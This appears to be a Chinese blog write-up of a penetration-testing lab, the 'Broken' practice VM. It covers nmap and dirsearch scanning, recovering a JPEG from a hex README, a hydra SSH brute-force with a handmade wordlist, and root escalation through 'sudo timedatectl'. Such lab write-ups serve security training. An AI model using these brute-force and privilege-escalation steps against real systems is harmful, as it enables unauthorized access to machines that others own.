Broken打靶渗透

最新推荐文章于 2024-08-02 16:22:25 发布
最新推荐文章于 2024-08-02 16:22:25 发布
阅读量285 收藏 5
点赞数 4
文章标签: 网络 web安全 网络安全 经验分享 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65112983/article/details/140782390
版权

一、信息收集

1、查看靶机的mac地址:

2、扫描靶机的ip:

nmap 192.168.13.0/24

3、扫描靶机的端口:

nmap -p- 192.168.13.146

4、访问靶机的80端口:

5、页面没有功能点,扫描一下靶机目录查看是否有有效信息:

dirsearch -u "http://192.168.13.146"

可以看到目录也没有太有用的信息,都是页面展示出来的路径

6、查看README.md文件,是一个十六进制文件,查看开头,可能是一个图片:

7、在kali里面下载文件并修改后缀为jpeg:

mv README.md README.jpeg

xdg-open README.jpeg

8、发现不能查看:

9、将十六进制文件转换为二进制文件进行查看:

xxd -r -ps README.jpeg > README.bin

strings README.bin

10、经过查看,确实是jpeg文件,将文件修改名字进行查看:

mv README.bin README1.jpeg

11、制作一个手工字典爆破图片中的信息:

12、爆出来ssh账号和密码:

hydra -L /home/kali/passwd.txt -P /home/kali/passwd.txt -t 10 -vV -e ns 192.168.13.146 ssh -f

13、使用账号和密码进行登录:

通过查看发现用户权限较低

二、提权

1、查看是否有sudo提权的权限:

sudo -l

2、发现有文件,使用sudo timedatectl list-timezones提权:

发现已经成功提到root用户了

3、输入bash -i获得一个交互shell:

搬砖小星
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
常见渗透测试靶场
qfliweimin的博客
05-26 4136
1.DVWA 作为新手,通常第一个听说的靶场应该就是DVWA,部署简单安装完对应版本的PAM(PHP-Apache-MySQL),简单配置后就可以使用。 1、DVWA靶场可测试漏洞:暴力破解(Brute Force)、命令注入(Command Injection)、跨站请求伪造(CSRF)、文件包含(File Inclusion)、文件上传(File Upload)、不安全的验证码(Insecure CAPTCHA)、SQL注入(SQL Injection)、SQL盲注(SQL Injection Bl
看我如何从外网直接拿下内网靶标
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
11-29 754
1.拿到目标制定策略进行信息收集 某地攻防演练拿到演习目标后,进行了一波常规信息收集,打了一个靶标。 发现靶标分数有点高还是打靶标来得快,于是对所有靶标进行分析。但是大部分靶标都给的是内网地址, 观察了一下收集的所有目标ip发现基本上存在于xx.xx.98.x-xx.xx.106.x这个范围 主动扩大范围扫描x.x.95.x-x.x.110.x这些段,直接通过fofa api查询所有记录 然后使用我B哥的webalivescan扫描 https://github.com/broken5/
渗透测试靶场
菜鸟-传奇
10-24 7319
渗透测试靶场 sqli-labs sqli-labs包含了大多数的sql注入类型,以一种闯关模式,对于sql注入进行漏洞利用下载地址:https://github.com/Audi-1/sqli-labs xss challenges xsschallenges是一个专对于XSS漏洞练习的在线靶场,包含了各种绕过,各种姿势的XSS利用下载地址:http://xss-quiz.int21h...
网络安全必学渗透测试流程
kali_Ma的博客
02-25 1428
这个靶场是一个对渗透新手很友好的靶场。而且,该靶场包含了渗透测试的信息收集,漏洞利用和权限提升的全过程,对新手理解渗透测试的流程有很好的帮助。 靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Hundred 靶场基本情况: KALI靶机:192.168.1.3/24 主机:192.168.1.146/24 目标:普通用户flag和管理员flag 信息收集阶段: nmap -sn 192.168.1.0/2 sudo nmap -v -T4 -p-
OWASP Security Shepherd靶场实战
Kevin's Blog
05-08 3454
文章目录一、介绍二、配置三、漏洞模式四、漏洞实战过程 一、介绍 OWASP Security Shepherd(安全牧羊人)靶场,是OWASP Broken Web Apps中集成的一个靶场,开发语言JAVA 二、配置 搭建好OWASP BWA后,点击OWASP Security Shepherd 》》输入用户名密码(admin password)进行登录 》》首次登录后为了安全需要设置一个...
swift.rar_Swift_The Broken
09-23
在给定的压缩包"swift.rar_Swift_The_Broken"中,我们关注的是一个名为"swift.h"的头文件,它涉及到Swift语言的一个特殊模块——“_broken_”Swift SRMMU(System Request Memory Management Unit)MMU模块。...
nft_nat.rar_The Broken
09-19
标题 "nft_nat.rar_The_Broken" 暗示我们关注的是与网络过滤表(NFT)相关的Nat(网络地址转换)功能,可能存在ABI(应用程序二进制接口)兼容性问题。这个问题在未来可能导致系统不稳定或者无法正确运行依赖于这个...
Broken Link Checker-1.0.9.zip
12-27
名称:Broken Link Checker ---------------------------------------- 版本:1.0.9 作者:https://error404.atomseo.com/ 分类:开发者工具 ---------------------------------------- 概述:在网页上查找所有损坏...
Avoiding broken executables when using dynamic Vls
06-20
当构建使用动态VI的可执行文件时,必须确保在LabVIEW Application Builder规范的'always include'部分指定动态VI的名称。不这样做会导致问题,表现为LabVIEW应用程序将无法加载您的动态Vl,并将引发各种错误或导致...
ca3.zip_heart broken_zip
07-14
broken heart repairing
网安科班精选!爱荷华大学教授的网络安全零基础入门教程!
互联网架构小马的博客
07-31 562
网络就像一把双刃剑,给我们的生活、交流、工作和发展带来了便利,但同时也给信息安全以及个人隐私带来了威胁。网络和信息安全问题不仅影响了网络的普及和应用,还关系到企国家、军队、企业的信息安全和社会的经济安全,让人又爱又恨。今天给大家分享的这份手册,主要从网络漏洞、协议和安全解决方案等方面来探讨网络安全问题。我们把网络看成是不安全安全的源头,通过分析网络漏洞、探测、攻击和减少攻击的方法,来研究不同的网络协议。
【Vulnhub系列】Vulnhub Connect-The-Dots 靶场渗透(原创)
最新发布
Lusen的博客
08-02 470
Vulnhub系列Connect-The-Dots靶场做题记录
计算机网络—电路、分组、报文交换—图文详解
喻师傅的学习笔记
07-31 775
计算机网络—三种交换方式图文详解
linux操作系统_TCP
hkhkhkhkh123的博客
07-30 1077
1)三次握手和四次挥手机制 2) 确认应答:TCP将每个字节的数据都进行了编号,即为序列号。每一个ACK都带有对应的确认序列号,保证数据不丢失的按序到达 3)超时重传:当发送端发送的数据在网络中丢失时,在一定时间内没有收到接收端的ACK,则发送端会重新发送丢失数据。2. ACK: 确认应答标志 3. PSH: 表示发送数据,提示接收端从TCP接收缓冲区中读走数据,为接收后续数据腾出空间 4. RST: 重置连接标志 5. SYN: 表示请求建立一个连接 6. FIN: finish标志, 表示释放连接。
网络安全在2024好入行吗?
2401_84466225的博客
07-29 682
024年的今天,慎重进入网安行业吧,目前来说信息安全方向的就业对于学历的容忍度比软件开发要大得多,还有很多高中被挖过来的大佬。
Springboot+Websocket+Security+Vue 实现弹幕推送功能
Gemini1995的博客
08-01 496
【代码】Springboot+Websocket+Security+Vue 实现弹幕推送功能。
Python面试题:如何使用WebSocket实现实时Web应用
bigorsmallorlarge的专栏
07-30 597
通过上述步骤,你可以使用 Django Channels 和 WebSocket 创建一个简单的实时 Web 应用。Django Channels 提供了强大的功能,使得在 Django 中实现实时功能变得更加容易。你可以在此基础上扩展,添加更多功能和复杂的逻辑。
保护国外使用代理IP的安全方法
iphttp的博客
07-30 434
用户在国外使用代理IP时,应该时刻保持警惕,不要随意点击可疑链接,养成良好的网络安全意识。此外,用户还应该避免在代理服务器上输入敏感信息,如银行账号、密码等。使用代理IP时,用户应该尽量使用加密协议(如SSL、TLS)来保护数据传输的安全。这将确保用户的个人信息和访问记录不会被黑客窃取或监控。在选择代理服务器时,用户应该选择那些经过验证和信任的服务器,如知名的VPN服务提供商。用户应该定期更新操作系统和软件,以确保其安全性。这样可以有效地防止黑客通过代理服务器攻击用户的计算机或移动设备。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值